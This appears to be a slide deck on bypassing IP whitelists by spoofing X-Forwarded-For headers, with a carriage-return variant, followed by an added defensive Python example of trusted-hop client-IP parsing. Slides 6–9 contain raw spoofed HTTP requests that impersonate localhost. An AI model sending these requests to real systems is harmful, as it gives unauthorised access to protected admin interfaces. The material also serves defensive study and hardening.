Slide 1

Slide 1 text

At Home Among Strangers. Bypassing the IP whitelists of some web applications due to incorrect parsing of HTTP request headers.

Slide 2

Slide 2 text

Reverse Proxy

Slide 3

Slide 3 text

No content

Slide 4

Slide 4 text

[Diagram: X-Forwarded-For: , ... X-Forwarded-For: , ,]

Slide 5

Slide 5 text

HTTP-request

GET / HTTP/1.1
Host: admin.my.site
Connection: close

GET / HTTP/1.1
Host: admin.my.site
X-Forwarded-For: 123.123.123.123, 192.168.1.1
Connection: close

[Diagram: X-Forwarded-For: ,]

Slide 6

Slide 6 text

XFF/XRI Spoofing

GET / HTTP/1.1
Host: admin.my.site
X-Forwarded-For: 127.0.0.1
Connection: close

GET / HTTP/1.1
Host: admin.my.site
X-Forwarded-For: 127.0.0.1, 123.123.123.123, 192.168.1.1
Connection: close

[Diagram: X-Forwarded-For: , ,]

Slide 7

Slide 7 text

HTTP-request

GET / HTTP/1.1\r\n
Host: admin.my.site\r\n
X-Forwarded-For: 127.0.0.1\r\n
Connection: close\r\n
\r\n

[Diagram: X-Forwarded-For: , ,]

Slide 8

Slide 8 text

HTTP-request with 0d

GET / HTTP/1.1\r\n
Host: admin.my.site\r\n
X-Forwarded-For: 127.0.0.1\r\r\n
Connection: close\r\n
\r\n

[Diagram: X-Forwarded-For: \r, ,]

Slide 9

Slide 9 text

XFF/XRI Spoofing+

GET / HTTP/1.1\r\n
Host: admin.my.site\r\n
X-Forwarded-For: 127.0.0.1\r\r\n
Connection: close\r\n
\r\n

GET / HTTP/1.1
Host: admin.my.site
X-Forwarded-For: 127.0.0.1 , 123.123.123.123, 192.168.1.1
Connection: close

[Diagram: X-Forwarded-For: , ,]

Tomcat? WebSphere?
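How a backend should derive the client address so that neither the plain XFF spoof of slide 6 nor the \r\r\n variant of slide 9 gets past an IP whitelist. This is an added example and not code from the slides or their author; the proxy addresses (192.168.1.1 and 192.168.1.2), the allowlist and the three sample requests are constructed assumptions that reuse the addresses shown on the slides.

```python
"""Client-IP derivation from X-Forwarded-For: naive rule vs. trusted-hop parse.

Added example; it is not from the original slides. TRUSTED_PROXIES,
ALLOWED_CLIENTS and the sample requests are constructed assumptions
that mirror the addresses used on the slides.
"""
import ipaddress
from typing import List, Optional, Union

IPAddress = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]

# Assumed: the reverse proxies in front of admin.my.site. 192.168.1.1 is the
# first proxy (it shows up inside XFF); 192.168.1.2 is the second one, which
# opens the TCP connection to the backend.
TRUSTED_PROXIES = {
    ipaddress.ip_address("192.168.1.1"),
    ipaddress.ip_address("192.168.1.2"),
}

# Assumed allowlist for the admin interface: localhost and an internal range.
ALLOWED_CLIENTS = [
    ipaddress.ip_network("127.0.0.1/32"),
    ipaddress.ip_network("10.0.0.0/8"),
]


def xff_tokens(raw_request: bytes) -> List[str]:
    """Return the comma-separated X-Forwarded-For values of a raw request.

    Lines are split on CRLF only, so a bare CR inside a value (the \\r\\r\\n
    trick) stays inside its token, exactly as it reaches a backend that does
    not normalise header values.
    """
    tokens: List[str] = []
    for line in raw_request.split(b"\r\n"):
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"x-forwarded-for":
            tokens.extend(t.strip(b" \t").decode("latin-1") for t in value.split(b","))
    return tokens


def naive_client_ip(tokens: List[str]) -> Optional[str]:
    """The rule the slides abuse: the leftmost XFF value is taken as the client."""
    return tokens[0] if tokens else None


def strict_client_ip(tokens: List[str], peer_ip: str) -> Optional[IPAddress]:
    """Derive the client by walking the chain from the nearest hop.

    XFF is only meaningful when the TCP peer is one of our own proxies. Every
    token must parse as an IP address; a single malformed token (for example
    '127.0.0.1\\r') discards the whole header. The client is the first hop,
    counted from the right, that is not a trusted proxy.
    """
    peer = ipaddress.ip_address(peer_ip)
    if peer not in TRUSTED_PROXIES:
        return peer          # direct connection: XFF is attacker-controlled noise
    try:
        chain = [ipaddress.ip_address(t) for t in tokens]
    except ValueError:
        return None          # malformed header: refuse to guess
    for hop in reversed(chain):
        if hop not in TRUSTED_PROXIES:
            return hop
    return None              # chain holds only proxies: client unknown


def is_allowed(raw_request: bytes, peer_ip: str) -> bool:
    """Allowlist check that fails closed when no client address can be derived."""
    client = strict_client_ip(xff_tokens(raw_request), peer_ip)
    if client is None:
        return False
    return any(client in net for net in ALLOWED_CLIENTS)


# Constructed requests as they arrive at the backend after both proxies appended.
SPOOFED = (
    b"GET / HTTP/1.1\r\n"
    b"Host: admin.my.site\r\n"
    b"X-Forwarded-For: 127.0.0.1, 123.123.123.123, 192.168.1.1\r\n"
    b"Connection: close\r\n\r\n"
)
SPOOFED_CR = (
    b"GET / HTTP/1.1\r\n"
    b"Host: admin.my.site\r\n"
    b"X-Forwarded-For: 127.0.0.1\r, 123.123.123.123, 192.168.1.1\r\n"
    b"Connection: close\r\n\r\n"
)
INTERNAL = (
    b"GET / HTTP/1.1\r\n"
    b"Host: admin.my.site\r\n"
    b"X-Forwarded-For: 10.0.0.5, 192.168.1.1\r\n"
    b"Connection: close\r\n\r\n"
)
BACKEND_PEER = "192.168.1.2"  # assumed: the second proxy is the backend's TCP peer

if __name__ == "__main__":
    for label, req in (("spoofed", SPOOFED), ("spoofed+CR", SPOOFED_CR), ("internal", INTERNAL)):
        toks = xff_tokens(req)
        print(label, "naive:", repr(naive_client_ip(toks)),
              "strict:", strict_client_ip(toks, BACKEND_PEER),
              "allowed:", is_allowed(req, BACKEND_PEER))
```

The naive rule returns 127.0.0.1 for the spoofed request and lets it through; the strict parse skips the known proxy hop, lands on 123.123.123.123 and denies it. For the \r variant the malformed first token makes the whole header untrusted, so the check fails closed instead of trimming the stray CR into a whitelisted address.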

Slide 10

Slide 10 text

Twi: @i_bo0om Site: bo0om.ru Telegram: @webpwn